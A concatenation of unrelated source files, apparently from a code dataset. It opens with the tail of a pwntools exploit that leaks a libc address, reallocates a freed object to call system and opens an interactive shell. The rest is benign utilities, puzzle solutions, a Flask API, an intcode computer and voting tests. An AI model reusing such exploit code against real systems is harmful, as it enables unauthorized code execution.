leak = p.recv().split("\n")[0].split()[-1]
leak = int(leak)
log.info("Leaked short_str: 0x{:x}".format(leak))
system_addr = leak - SYSTEM_OFFSET
# Delete string and realloc as num
p.sendline(DEL_STR)
p.sendline(MAKE_NUM)
p.sendline(str(system_addr))
# Call `system`
p.sendline(PRINT_STR)
p.sendline("1")
p.interactive()
| true |
8947b0311f983a830ad07df5ca8c687f1fd044e9 | Python | bingqingsuimeng/face_data_preprocess | /utils.py | UTF-8 | 3,333 | 3.234375 | 3 | [] | no_license | import os
import time
def mkdir(dir):
try:
os.mkdir(dir)
except OSError:
pass
def load_image_names_and_path(img_folder_path):
'''
Useage: image_names, image_paths, image_names_no_suffix= load_image_names_and_path(img_folder_path)
:param img_folder_path:
:return:
'''
image_names = next(os.walk(img_folder_path))[2]
image_paths = []
image_names_no_suffix = []
for image_name in image_names:
image_names_no_suffix.append(os.path.splitext(image_name)[0])
image_paths.append(img_folder_path + '/' + image_name)
return image_names, image_paths, image_names_no_suffix
def suitable_unit(value):
unit_str = 'sec'
if value > 3600:
unit_str = 'hour'
value /= 3600
elif value < 100:
pass
else:
unit_str = 'min'
value /= 60
return unit_str, value
def Display_remain_time(num_done_for_display, num_total, time_start, point_rate=0.10, show_every_epoch=False):
'''
Usage format: put in the end of Loop body:
import time
from Tianchi_utils import Display_remain_time
...
...
# -----------------------------
# for Display_remain_time
time_start = time.time()
num_done_for_display = 0
# -----------------------------
loop:
...
...
...
num_done_for_display = Display_remain_time(num_done_for_display, n_total_image, time_start)
end of loop
:param num_done_for_display: num of loop already done
:param num_total: num of total loop to run
:param time_start: start time of first loop, after loading all the data if necessary
:return: num_done_for_display
'''
num_done_for_display += 1
point = int(num_total * point_rate)
if point == 0:
point = 1
time_now = time.time()
if num_done_for_display % point == 0 or show_every_epoch:
remain_time = float(time_now - time_start) * (num_total - num_done_for_display) / num_done_for_display
remain_unit_str, remain_time = suitable_unit(remain_time)
print(' Already done {:d}/{:d} ({:.2f}%), est remain time: {:.2f} {:s}'.format(
num_done_for_display, num_total, num_done_for_display / num_total * 100, remain_time, remain_unit_str
))
elif num_done_for_display == 1: # start successfully
print(' ----------------------------------------------- ')
print(' Start Running Successfully! Already done 1/{:d}'.format(num_total))
print(' The remain time of this task will be automatically estimated and showed every {}%.'.format(point_rate*100))
elif num_done_for_display == num_total: # finished
total_time = float(time_now - time_start)
aver_time = total_time / num_total
total_unit_str, total_time = suitable_unit(total_time)
aver_unit_str, aver_time = suitable_unit(aver_time)
print(' ----------------------------------------------- ')
print(' Running Finished!')
print(' Total time consumption: {:.2f} {:s}, average running time for each loop: {:.4f} {:s}'.format(
total_time, total_unit_str, aver_time, aver_unit_str
))
print(' ----------------------------------------------- ')
return num_done_for_display | true |
0d4f5c7c137cb5c8f047c017c6875511dbfc3e80 | Python | samar2788/codwars-katas | /reverseinbetween.py | UTF-8 | 511 | 3.859375 | 4 | [] | no_license | def reverse(st, a, b) :
print(len(st))
# Invalid range
if (b >= len(st)) :
b=len(st)-1
print(b)
st = list(st)
# While there are characters to swap
while (a <= b) :
# Swap(str[l], str[r])
c = st[a]
st[a] = st[b]
st[b] = c
a += 1;
b -= 1;
return "".join(st)
print(reverse('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ',6,56))
# def solve(s,a,b):
# return s[:a]+s[a:b+1][::-1]+s[b+1:] | true |
38ae95963dd2463d1e463affd3caa1ba071021e7 | Python | jnoob/algorithms | /py/leetcode/dp/_010_regexMatch.py | UTF-8 | 275 | 2.890625 | 3 | [] | no_license |
class Solution:
def isMatch(self, s: str, p: str) -> bool:
input, pattern = s, p
iIndex, pIndex = 0, 0
def findStarts(self, p):
indexs = []
for i in p:
if i == '*':
indexs.append(i)
return indexs
| true |
bc10a8701c9dd90eca216068f4bfe9b2eb6adc95 | Python | mbg17/superlist | /day15/shujuku.py | UTF-8 | 1,780 | 2.65625 | 3 | [] | no_license | #1,luyuan,23,13020166103,IT
# 定义取数规则
dic={'name':1,'id':0,'age':2,'telephone':3,'job':4}
def read_file(filename):
with open(filename,encoding='utf-8') as f:
for i in f:
view_list=i.split(',')
yield view_list
# 去除符合条件的所有数据
def filter_detail(detail):
g = read_file('userinfo')
if '>' in detail:
if '=' in detail:
col, val =detail.strip().split('>=')
for i in g:
if int(i[dic[col.strip()]])>=int(val.strip()):
yield i
else:
col, val = detail.strip().split('>')
for i in g:
if int(i[dic[col.strip()]])>int(val.strip()):
yield i
if '<' in detail:
if '=' in detail:
col, val =detail.strip().split('<=')
for i in g:
if int(i[dic[col.strip()]])<=int(val.strip()):
yield i
else:
col, val =detail.strip().split('<')
for i in g:
if int(i[dic[col.strip()]])>int(val.strip()):
yield i
if '=' in detail:
col, val = detail.strip().split('=')
for i in g:
if int(i[dic[col.strip()]]) == int(val.strip()):
yield i
# 根据字段提取数据
def views(tj,shuju):
if tj =='*':
views=['id','name','age','telephone','job']
else:
views = tj.strip().split(',')
for s in shuju:
lists = []
for v in views:
lists.append(s[dic[v.strip()]].strip())
print(lists)
ret = 'select id, name, age where age <=19'
result= ret.split('where')
val = result[0].replace('select','').strip()
tiaojian = result[1].strip()
views(val,filter_detail(tiaojian)) | true |
da6b1b75544d866e65f11126fee5f96a442cae59 | Python | justinlboyer/earnscrape | /make_db.py | UTF-8 | 4,310 | 2.765625 | 3 | [] | no_license | import datetime
from dateutil.relativedelta import relativedelta
import json
import logging
import os
from tqdm import tqdm
logging.basicConfig(filename="instantiate_db.log",
format='%(asctime)s %(message)s',
filemode='w')
logger=logging.getLogger()
logger.setLevel(logging.DEBUG)
def get_all_entries(earnings_data_path):
get_all = os.listdir(earnings_data_path)
logger.debug(f"Retrieved {len(get_all)} tickers")
return get_all
def instatiate_db(earnings_data_path):
get_all = get_all_entries(earnings_data_path)
scape_dict = {}
for ticker in tqdm(get_all):
if ticker != 'metadata':
dates = get_all_dates(ticker)
scape_dict[ticker] = create_entry_for_ticker(ticker, dates)
else:
logger.debug(f"Removed {ticker} from db")
return scape_dict
def get_all_dates(ticker, earnings_data_path='./data'):
get_dates = os.listdir(f'{earnings_data_path}/{ticker}')
datetime_list = parse_dates(get_dates)
return datetime_list
def create_entry_for_ticker(ticker, dates):
missing_dates = find_missing_quarters(dates)
ticker_dict = {
'earliest_earnings': human_readable_datetimes(min(dates))
, 'most_recent_earnings': human_readable_datetimes(max(dates))
,'missed_quarters': human_readable_datetimes(missing_dates)
, 'created_at': human_readable_datetimes(datetime.datetime.now())
, 'updated_at': human_readable_datetimes(datetime.datetime.now())
}
return ticker_dict
def human_readable_datetimes(dates):
if type(dates) is datetime.datetime:
return dates.strftime('%Y-%m-%d %H:%M:%S')
elif type(dates) is datetime.date:
return dates.strftime('%Y-%m-%d')
elif type(dates) is list:
return [dte.strftime('%Y-%m-%d') for dte in dates]
elif type(dates) is str:
return dates
def save_dict(scrape_dict, path):
with open(path, 'w') as fp:
json.dump(scrape_dict, fp, sort_keys=True)
def parse_dates(date_list):
dates = [datetime.datetime.strptime(dte[:-5], '%Y_%m_%d').date() for dte in date_list]
return dates
def covert_dates_datetimes(date_list):
if type(date_list) is datetime.date or type(date_list) is datetime.datetime:
return date_list
else:
if type(date_list) is list:
if '-' in date_list[0]:
date_list = [datetime.datetime.strptime(dte, '%Y-%m-%d').date() for dte in date_list]
elif '_' in date_list[0]:
date_list = [datetime.datetime.strptime(dte, '%Y-%m-%d').date() for dte in date_list]
return date_list
elif type(date_list) is str:
if '-' in date_list:
return datetime.datetime.strptime(date_list, '%Y-%m-%d').date()
elif '_' in date_list:
return datetime.datetime.strptime(date_list, '%Y_%m_%d').date()
else:
return date_list
def find_missing_quarters(dates):
now = datetime.datetime.now().date()
three_mon_rel = relativedelta(months=3)
last_day_date_list = [last_day_of_month(dte) for dte in dates]
on_date = min(last_day_date_list)
three_months_from_on = on_date + three_mon_rel
missing_dates = []
while three_months_from_on <= now:
test = any([three_months_from_on==dte for dte in last_day_date_list])
if test is False:
missing_dates.append(three_months_from_on)
three_months_from_on = last_day_of_month(three_months_from_on + three_mon_rel)
return missing_dates
def last_day_of_month(datetime_date):
datetime_date = covert_dates_datetimes(datetime_date)
next_month = datetime_date.replace(day=28) + datetime.timedelta(days=4) # this will never fail
return next_month - datetime.timedelta(days=next_month.day)
if __name__ == '__main__':
earnings_data_path = './data'
metadata_save_path = f'{earnings_data_path}/metadata/metadata.json'
logger.debug(f"Searching: {earnings_data_path}")
db_dict = instatiate_db(earnings_data_path)
logger.debug(f"Generated {len(db_dict)} entries for db")
logger.debug(f"Saving to {metadata_save_path}")
save_dict(db_dict, metadata_save_path)
| true |
a44a08a1a3218fd6b6a66eb0c3189911801535a1 | Python | akerusan-s/flask-project | /data/users_resource.py | UTF-8 | 3,853 | 2.734375 | 3 | [] | no_license | from flask_restful import reqparse, abort, Resource
from data import db_session
from .__all_models import User
from flask import jsonify
# инициализация парсера
parser = reqparse.RequestParser()
parser.add_argument("surname")
parser.add_argument("name")
parser.add_argument("email")
parser.add_argument("password")
def abort_if_user_not_found(user_id):
"""Обработка ошибки ненахождения пользователя"""
session = db_session.create_session()
user = session.query(User).get(user_id) # пользователь
if not user:
abort(404, message=f"User {user_id} not found")
def abort_if_user_no_permission(user_id, password):
"""Проверка прав пользоваетля через пароль"""
session = db_session.create_session()
user = session.query(User).get(user_id)
# собственно проверка (как при авторизации)
if not user.check_password(password):
abort(403, message=f"No permission for user: {user_id} - wrong password")
class UsersResource(Resource):
""" API для 1 пользователя """
def get(self, user_id, password):
"""GET-запросы"""
abort_if_user_not_found(user_id)
session = db_session.create_session()
user = session.query(User).get(user_id)
# больше данных при правильно введенном пароле
if user.check_password(password):
return jsonify({'user': user.to_dict(only=("id", "surname", "name", "email", "shops_created",
"liked_goods", "liked_shops", "modified_date"))})
return jsonify({'user': user.to_dict(only=("id", "surname", "name", "email", "shops_created"))})
def delete(self, user_id, password):
"""DELETE-запросы"""
abort_if_user_not_found(user_id)
abort_if_user_no_permission(user_id, password)
session = db_session.create_session()
user = session.query(User).get(user_id)
session.delete(user) # удаляем нужного нам пользователя
session.commit()
return jsonify({'success': 'OK'})
def put(self, user_id, password):
"""PUT-запросы"""
abort_if_user_not_found(user_id)
abort_if_user_no_permission(user_id, password)
args = parser.parse_args()
session = db_session.create_session()
user = session.query(User).get(user_id)
# изменяем то, что есть в запросе
if args["surname"]:
user.surname = args["surname"]
if args["name"]:
user.name = args["name"]
if args["email"]:
user.email = args["email"]
if args["password"]:
user.set_password(args["password"])
session.commit()
return jsonify({'success': 'OK'})
class UsersListResource(Resource):
"""API для списка пользователей"""
def get(self):
"""GET-запросы"""
session = db_session.create_session()
users = session.query(User).all()
return jsonify({'users': [item.to_dict(only=("id", "surname", "name", "email", "shops_created")) for item in users]})
def post(self):
"""POST-запросы"""
args = parser.parse_args()
session = db_session.create_session()
# создание пользователя, остальные данные по умолчанию
user = User(
surname=args["surname"],
name=args["name"],
email=args["email"],
)
user.set_password(args["password"])
session.add(user)
session.commit()
return jsonify({'success': 'OK'})
| true |
dee8d730df27b7b684b38d6136724dbd96864f7a | Python | FernandaDR/Programaci-n | /examenes1/examen1_coronavirus.py | UTF-8 | 1,414 | 3.5 | 4 | [] | no_license | #----------------mensajes-------------
MENSAJE_BIENVENIDA = "Bienvenido,"
MENSAJE_BIENVENIDO_II = " a continuación será evaluado para determinar su estado de salud."
MENSAJE_NOMBRE = "Por favor introduzc su nombre \n "
MENSAJE_TEMP = "Por favor intraduzca la temperatura actual de su cuerpo \n"
MENSAJE_LUGAR = "Por favor ingrese su lugar de procedencia \n"
MENSAJE_OBSERVACION = "Usted se encuentra en estado de observacion"
MENSAJE_SALUDABLE = "Usted se encuentra en estado saludable"
MENSAJE_HIPOTERMIA = "Usted se encuentra en estado de hipotermia"
MENSAJE_ALERTA = "Usted se encuentra en estado de alerta"
MENSAJE_PELIGRO = "Usted se encuentra en estado de peligro"
#--------------entradas-------------
_nombrePersona = ""
T = 0.0
_lugar_procedencia = ""
#--------------variables-----------
T = 0.0
A = "China"
B = "Iran"
C = "Italia"
#-------------codigo---------------
_nombrePersona = input(MENSAJE_NOMBRE)
T = float(input(MENSAJE_TEMP))
_lugar_procedencia = input(MENSAJE_LUGAR)
print(MENSAJE_BIENVENIDA, _nombrePersona, MENSAJE_BIENVENIDO_II)
if(_lugar_procedencia == A) or (_lugar_procedencia == B) or (_lugar_procedencia == C):
print(MENSAJE_OBSERVACION)
else:
if(T>=36) and (T<=38.4):
print(MENSAJE_SALUDABLE)
elif(T<36):
print(MENSAJE_HIPOTERMIA)
elif(T>=38.5) and (T<=40):
print(MENSAJE_ALERTA)
else:
print(MENSAJE_PELIGRO)
| true |
6dccc78dc5c85c78fbd45fe14b5b3a72eb511415 | Python | Skaft/aoc | /2019/day5/aoc5-pruned.py | UTF-8 | 4,879 | 3.515625 | 4 | [] | no_license | """
My attempt to tidy up the intcode computer.
The main issue was finding a consistent and clear way of handling parameter
modes. In the end I landed with a decorator. It allows me to replace parameters
according to their mode before a function gets them, as well as to bypass this
system in a flexible way by marking individual parameters as non-replaceable.
I used Enum for Opcodes and Parameter modes, mostly to try out Enum. But it
grants some extra readability, and also lets me map Computer methods to opcodes
by name. Still unsure if this is just redundant and/or silly, and that I should
be mapping integers to methods/functions using a dict or something.
"""
from input import data
from enum import Enum
from functools import wraps
from itertools import zip_longest
class Opcode(Enum):
"""Names of the opcode methods"""
ADD = 1
MUL = 2
INPUT = 3
OUTPUT = 4
JUMP_TRUE = 5
JUMP_FALSE = 6
LESS_THAN = 7
EQUALS = 8
EXIT = 99
class ParameterMode(Enum):
"""Parameter modes recognized by the Computer"""
POSITION = 0
IMMEDIATE = 1
DEFAULT = 0
# Just an alias
Mode = ParameterMode
def moded(skip=None):
"""
Decorator for replacing Computer method params according to their mode.
The optional 'skip' argument can be an int or an iterable of ints, marking
(by index) parameters that should not be replaced regardless of their mode.
"""
if skip is None:
skip = []
elif isinstance(skip, int):
skip = [skip]
def deco(method):
@wraps(method)
def wrapper(comp_inst, *params, modes=None):
if modes is None:
modes = []
params = list(params)
prm_mode_pairs = zip_longest(params, modes, fillvalue=Mode.DEFAULT)
for i, (prm, mode) in enumerate(prm_mode_pairs):
if i in skip or mode == Mode.IMMEDIATE:
pass
elif mode == Mode.POSITION:
params[i] = comp_inst.get(prm)
else:
raise ValueError(f'Unknown parameter mode: {mode}')
return method(comp_inst, *params)
# The number of parameters needs to be known before calling, so that
# the parameters can be read properly. Reading it from the decorated
# function and sticking it on the wrapper (subtracting 1 to account for
# the "self" arg) to avoid redundant storage, though a bit hacky
wrapper.param_count = method.__code__.co_argcount - 1
return wrapper
return deco
class Computer:
def __init__(self, program, io=0, pointer=0):
self.program = program
self.io = io
self.pointer = pointer
def set(self, position, value):
self.program[position] = value
def get(self, position):
return self.program[position]
@moded()
def _jump_true(self, n, position):
if n != 0:
self.pointer = position
@moded()
def _jump_false(self, n, position):
if n == 0:
self.pointer = position
@moded(skip=2)
def _add(self, a, b, position):
self.set(position, a + b)
@moded(skip=2)
def _mul(self, a, b, position):
self.set(position, a * b)
@moded(skip=0)
def _input(self, position):
self.set(position, self.io)
@moded()
def _output(self, value):
self.io = value
@moded(skip=2)
def _less_than(self, a, b, position):
self.set(position, a < b)
@moded(skip=2)
def _equals(self, a, b, position):
self.set(position, a == b)
@staticmethod
def parse_opcode(value):
"""Split a number into opcode and parameter mode components"""
modes_int, codepoint = divmod(value, 100)
opcode = Opcode(codepoint)
param_modes = []
while modes_int:
modes_int, mode = divmod(modes_int, 10)
param_modes.append(Mode(mode))
return opcode, param_modes
def run(self):
while True:
# read and parse the value at the pointer
points_to = self.get(self.pointer)
opcode, param_modes = self.parse_opcode(points_to)
if opcode == Opcode.EXIT:
break
# collect the method matching the opcode
method = getattr(self, f"_{opcode.name.lower()}")
# collect parameters
param_start = self.pointer + 1
next_instr_start = param_start + method.param_count
params = map(self.get, range(param_start, next_instr_start))
# moving pointer before calling to not overwrite jump instructions
self.pointer = next_instr_start
method(*params, modes=param_modes)
for start_value in (1, 5):
comp = Computer(data.copy(), start_value)
comp.run()
print(comp.io)
| true |
9fe66a9b139921de5401a2e759cb4bb89f6c3bcd | Python | format37/tfodModelBanknotes | /using/lex.py | UTF-8 | 1,416 | 2.5625 | 3 | [] | no_license | import os
import requests
from datetime import datetime
def host_check(hostname):
return True if os.system("ping -c 1 " + hostname)==0 else False
def send_to_telegram(chat,message):
headers = {
"Origin": "http://scriptlab.net",
"Referer": "http://scriptlab.net/telegram/bots/relaybot/",
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36'}
url = "http://scriptlab.net/telegram/bots/relaybot/relaylocked.php?chat="+chat+"&text="+message
requests.get(url,headers = headers)
class filedate:
def __init__(self):
self.year = "0"
self.month = "0"
self.day = "0"
self.hour = "0"
self.minute = "0"
self.second = "0"
def update(self,filename):
filename=(filename[filename.find("2") : ])# for y2k only
self.year = filename[0:4]
self.month = filename[5:7]
self.day = filename[8:10]
self.hour = filename[11:13]
self.minute = filename[14:16]
self.second = filename[17:19]
def sqlFormat(self):
return self.year+"-"+self.month+"-"+self.day+"T"+self.hour+":"+self.minute+":"+self.second
def dateFormat(self):
#return datetime.strptime(self.year+"."+self.month+"."+self.day+" "+self.hour+":"+self.minute+":"+self.second,'%Y.%M.%d %H:%m:%S')
return datetime(int(self.year), int(self.month), int(self.day), int(self.hour), int(self.minute), int(self.second))
| true |
cdde07bd3bee6cf2111d251a7359b0dcaa0d2253 | Python | 19mddil/Python | /miscellenous/chapter2/panic.py | UTF-8 | 295 | 3.359375 | 3 | [] | no_license | phrase = "Don't panic!"
plist = list(phrase)#turing string into list
print(phrase)
print(plist)
new_phrase = "".join(plist[1:3])
print(new_phrase)
new_phrase = new_phrase+"".join([plist[5],plist[4]])
print(new_phrase)
new_phrase = new_phrase+"".join(plist[7:5:-1])
print(plist)
print(new_phrase) | true |
766eb3e55833a4af8e8e9d788ddaa6096b9b7b7a | Python | Cenibee/PYALG | /python/fromBook/chapter6/tree/47-serialize-and-deserialize-binary-tree/47-m.py | UTF-8 | 2,610 | 3.9375 | 4 | [] | no_license | # Definition for a binary tree node.
from typing import Deque, List
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Codec:
def serialize(self, root: TreeNode):
"""Encodes a tree to a single string.
:type root: TreeNode
:rtype: str
"""
def partial_serialize(node: TreeNode) -> List[str]:
if not node:
return ['n']
elif not node.left and not node.right:
return [str(node.val)]
else:
return [str(node.val), ':',\
*partial_serialize(node.left), '|',\
*partial_serialize(node.right)]
return ''.join(partial_serialize(root))
pos = 0
def deserialize(self, data: str) -> TreeNode:
"""Decodes your encoded data to tree.
:type data: str
:rtype: TreeNode
"""
# val을 가리키면서 시작하고, val을 가리키면서 끝난다.
def partial_deserialize() -> TreeNode:
if self.pos >= len(data):
return None
if data[self.pos] == 'n':
self.pos += 1
node = None
else:
start = self.pos
while len(data) > self.pos and\
(data[self.pos] != ':' and data[self.pos] != '|'):
self.pos += 1
node = TreeNode(int(data[start:self.pos]))
self.pos += 1
if self.pos < len(data) and data[self.pos - 1] == ':':
self.pos += 1
node.left = partial_deserialize()
node.right = partial_deserialize()
return node
result = partial_deserialize()
self.pos = 0
return result
# Your Codec object will be instantiated and called as such:
# ser = Codec()
def fulfil_tree(l: List[int]) -> TreeNode:
root = TreeNode(l[0])
q = Deque([root])
i = 1
while q and i < len(l):
node = q.popleft()
if l[i]:
node.left = TreeNode(l[i])
q.append(node.left)
i += 1
if i >= len(l):
break
if l[i]:
node.right = TreeNode(l[i])
q.append(node.right)
i += 1
return root
# deser = Codec()
# print(deser.serialize(fulfil_tree([1,2,3,None,None,4,5])))
# ans = deser.deserialize('10:22|33:44:66|n|51')
deser = Codec()
tree = fulfil_tree([1,2,3,None,None,4,5,6,7])
test = deser.serialize(tree)
a = deser.deserialize(test)
print('test') | true |
c463d6d5cfe4681891df197b6a8814a3138115ae | Python | kingflyfly/python_study | /第9章-再谈抽象/9.3.1.py | UTF-8 | 1,326 | 3.75 | 4 | [] | no_license | def check_index(key):
"""
指定的键是否是可接受的索引?
键必须是非负整数,才是可接受的。如果不是整数,
将引发TypeError异常;如果是负数,将引发Index
Error异常(因为这个序列的长度是无穷的)
"""
if not isinstance(key,int):raise TypeError
if key < 0: raise IndexError
class ArithmeticSequence:
def __init__(self,start=0,step=1):
"""
初始化这个算术序列
start -序列中的第一个值
step -两个相邻值的差
changed -一个字典,包含用户修改后的值
"""
# print(self)
self.start = start
self.step = step
self.change = {}
def __getitem__(self,key):
"""
从算术序列中获取一个元素
"""
check_index(key)
try:return self.change[key] # 修改过?
except KeyError: #如果没有修改过,就计算元素的值
return self.start + key * self.step
def __setitem__(self, key, value):
"""
修改算术序列中的元素
"""
check_index(key)
self.changed[key] = value
s = ArithmeticSequence(1, 3)
print(s[0])
print(s[1])
print(s[2])
print(s[3])
print(s[4])
s[3] = 2
| true |
50f8ab978497151974d1bf2f3b54b3451b4dd18f | Python | yaniv14/OpenCommunity | /src/shultze/test_functionality/test_plurality.py | UTF-8 | 2,878 | 2.75 | 3 | [
"BSD-2-Clause"
] | permissive | # Copyright (C) 2009, Brad Beattie
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from shultze.pyvotecore.plurality import Plurality
import unittest
class TestPlurality(unittest.TestCase):
# Plurality, no ties
def test_no_ties(self):
# Generate data
input = [
{"count":26, "ballot":"c1"},
{"count":22, "ballot":"c2"},
{"count":23, "ballot":"c3"}
]
output = Plurality(input).as_dict()
# Run tests
self.assertEqual(output, {
'candidates': set(['c1', 'c2', 'c3']),
'tallies': {'c3': 23, 'c2': 22, 'c1': 26},
'winner': 'c1'
})
# Plurality, alternate ballot format
def test_plurality_alternate_ballot_format(self):
# Generate data
input = [
{"count":26, "ballot":["c1"]},
{"count":22, "ballot":["c2"]},
{"count":23, "ballot":["c3"]}
]
output = Plurality(input).as_dict()
# Run tests
self.assertEqual(output, {
'candidates': set(['c1', 'c2', 'c3']),
'tallies': {'c3': 23, 'c2': 22, 'c1': 26},
'winner': 'c1'
})
# Plurality, irrelevant ties
def test_irrelevant_ties(self):
# Generate data
input = [
{"count":26, "ballot":"c1"},
{"count":23, "ballot":"c2"},
{"count":23, "ballot":"c3"}
]
output = Plurality(input).as_dict()
# Run tests
self.assertEqual(output, {
'candidates': set(['c1', 'c2', 'c3']),
'tallies': {'c3': 23, 'c2': 23, 'c1': 26},
'winner': 'c1'
})
# Plurality, relevant ties
def test_relevant_ties(self):
# Generate data
input = [
{"count":26, "ballot":"c1"},
{"count":26, "ballot":"c2"},
{"count":23, "ballot":"c3"}
]
output = Plurality(input).as_dict()
# Run tests
self.assertEqual(output["tallies"], {'c1': 26, 'c2': 26, 'c3': 23})
self.assertEqual(output["tied_winners"], set(['c1', 'c2']))
self.assert_(output["winner"] in output["tied_winners"])
self.assertEqual(len(output["tie_breaker"]), 3)
if __name__ == "__main__":
unittest.main()
| true |
eb36a6f1a71f7abbca5ef7d2cd9ef1f6e6c71994 | Python | hyejinHong0602/BOJ | /bronze3/[WEEK1] 10951 - A + B - 4.py | UTF-8 | 365 | 3.421875 | 3 | [] | no_license | # 이렇게 하면 런타임에러남.
while True:
a, b = map(int, input().split())
if (a>0 and b < 10):
print(a+b)
else:
break
# 입력의 끝이 안정해져있기때문에 이렇게 except 처리를 해줘야한다고 한다.
while True:
try:
a, b = map(int, input().split())
print(a+b)
except:
break | true |
3891c93bb99059d35a4082ef467073fdb99d62ec | Python | joker-xidian/espcn-1 | /dataloader.py | UTF-8 | 1,388 | 2.671875 | 3 | [] | no_license | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# @Time : 2019/2/8 11:39
# @Author : ylin
# Description:
#
from torch.utils.data.dataset import Dataset
from os.path import join
from os import listdir
from PIL import Image
def is_image_file(filename):
return any(filename.endswith(extension) for extension in ['.png', '.jpg', '.jpeg', '.JPG', '.JPEG', '.PNG'])
class DatasetFromFolder(Dataset):
def __init__(self, dataset_dir, input_transform=None, target_transform=None):
super(DatasetFromFolder, self).__init__()
self.image_dir = dataset_dir + 'X4/'
self.target_dir = dataset_dir + 'HR/'
self.image_filenames = [join(self.image_dir, x) for x in listdir(self.image_dir) if is_image_file(x)]
self.target_filenames = [join(self.target_dir, x) for x in listdir(self.target_dir) if is_image_file(x)]
self.input_transform = input_transform
self.target_transform = target_transform
def __getitem__(self, index):
image = Image.open(self.image_filenames[index]).convert('RGB')
target = Image.open(self.target_filenames[index]).convert('RGB')
if self.input_transform:
image = self.input_transform(image)
if self.target_transform:
target = self.target_transform(target)
return image, target
def __len__(self):
return len(self.image_filenames)
| true |
417abe05ed76361a5b6ca8f7729855d7777f9a86 | Python | crazywiden/Leetcode_daily_submit | /Widen/LC457_Circular_Array_Loop.py | UTF-8 | 3,553 | 3.90625 | 4 | [
"MIT"
] | permissive | """
LC 457 -- Circular Array Loop
You are given a circular array nums of positive and negative integers. If a number k at an index is positive,
then move forward k steps. Conversely, if it's negative (-k), move backward k steps. Since the array is circular,
you may assume that the last element's next element is the first element,
and the first element's previous element is the last element.
Determine if there is a loop (or a cycle) in nums.
A cycle must start and end at the same index and the cycle's length > 1.
Furthermore, movements in a cycle must all follow a single direction.
In other words, a cycle must not consist of both forward and backward movements.
Example 1:
Input: [2,-1,1,2,2]
Output: true
Explanation: There is a cycle, from index 0 -> 2 -> 3 -> 0. The cycle's length is 3.
Example 2:
Input: [-1,2]
Output: false
Explanation: The movement from index 1 -> 1 -> 1 ... is not a cycle,
because the cycle's length is 1. By definition the cycle's length must be greater than 1.
Example 3:
Input: [-2,1,-1,-2,-2]
Output: false
Explanation: The movement from index 1 -> 2 -> 1 -> ... is not a cycle,
because movement from index 1 -> 2 is a forward movement, but movement from index 2 -> 1 is a backward movement.
All movements in a cycle must follow a single direction.
"""
# naive method -- traverse all element one by one
# time complexity -- O(N^2)
# space complexity -- O(N)
# Runtime: 596 ms, faster than 24.03% of Python3 online submissions for Circular Array Loop.
# Memory Usage: 14 MB, less than 100.00% of Python3 online submissions for Circular Array Loop.
class Solution:
def circularArrayLoop(self, nums: List[int]) -> bool:
N = len(nums)
def helper(init):
visited_idx = {init}
curr_idx = init
if curr_idx + nums[curr_idx] >= 0:
next_idx = (curr_idx + nums[curr_idx]) % N
else:
next_idx = N - abs(curr_idx + nums[curr_idx]) % N
while next_idx not in visited_idx:
visited_idx.add(next_idx)
if nums[next_idx] * nums[init] < 0:
return False
curr_idx = next_idx
if curr_idx + nums[curr_idx] >= 0:
next_idx = (curr_idx + nums[curr_idx]) % N
else:
next_idx = N - abs(curr_idx + nums[curr_idx]) % N
if len(visited_idx) == 1:
return False
if curr_idx == next_idx:
return False
return True
if N == 1:
return False
for i in range(N):
if helper(i):
return True
return False
# method2 -- two pointers
class Solution:
def circularArrayLoop(self, nums: List[int]) -> bool:
N = len(nums)
visited = [False] * N
for i in range(N):
if not visited[i] and nums[i] != 0:
path = set()
direction = nums[i] // abs(nums[i])
j = i
while True:
next_j = (j + nums[j]) % N
if next_j in path:
return True
else:
path.add(j)
if next_j == j or direction * nums[next_j] <= 0 or visited[next_j]:
break
j = next_j
for j in path:
visited[j] = True
return False
| true |
4be5d71a17cf8b25c1de2ee84d189bfee5a5832d | Python | benjaminknebusch/formify | /first_app.py | UTF-8 | 664 | 2.734375 | 3 | [] | no_license | from formify.layout import *
from formify.controls import *
import formify
def print_text():
text = ui.value["text"]
if ui.value["print_mode"] == "Dialog":
formify.tools.ok_dialog("Text:", text)
else:
print(text)
def set_value():
ui.value = {'text': 'Moin GUI Runde ', 'print_mode': 'Dialog'}
ui = Form(Col(
Row(
ControlText(variable_name="text", value="Print this text"),
ControlCombo("Mode", items=["Dialog", "Print"], variable_name="print_mode"),
),
ControlButton("print or show dialog", on_click=print_text),
))
menu = {
"Print Menu": {
"print / show dialog": (print_text, "ctrl+p")
}
}
formify.MainWindow(ui, menu=menu, margin=8) | true |
85f70c757d0bedbc594bf888558f174b9fed2dcf | Python | cesarschool/cesar-school-fp-2018-2-lista2-JonathasBarreto | /questoes/questao_2.py | UTF-8 | 1,998 | 3.9375 | 4 | [] | no_license | ## QUESTÃO 2 ##
#
# Um robô se move em um plano a partir do ponto original (0,0). O robô pode se
# mover nas direções CIMA, BAIXO, ESQUERDA e DIREITA de acordo com um
# passo fornecido. O traço do movimento do robô é mostrado da seguinte forma:
#
# CIMA 5
# BAIXO 3
# ESQUERDA 3
# DIREITA 2
#
# Os números após a direção são passos.
# Escreva um programa para calcular a distância entre a posição atual e o
# ponto original após uma seqüência de movimentos. Se a distância for um
# float, basta imprimir o inteiro mais próximo.
# Exemplo:
# Se as seguintes tuplas são dadas como entrada para o programa:
#
# CIMA 5
# BAIXO 3
# ESQUERDA 3
# DIREITA 2
#
# Então, a saída do programa deve ser:
# 2
#
# Dicas:
# As entradas devem ser lidas do console até que um valor vazio seja digitado.
# A saída deve ser um inteiro que representa a distancia para o ponto original.
# Entradas inválidas devem ser descartadas da contagem.
##
##
# A sua resposta da questão deve ser desenvolvida dentro da função main()!!!
# Deve-se substituir o comado print existente pelo código da solução.
# Para a correta execução do programa, a estrutura atual deve ser mantida,
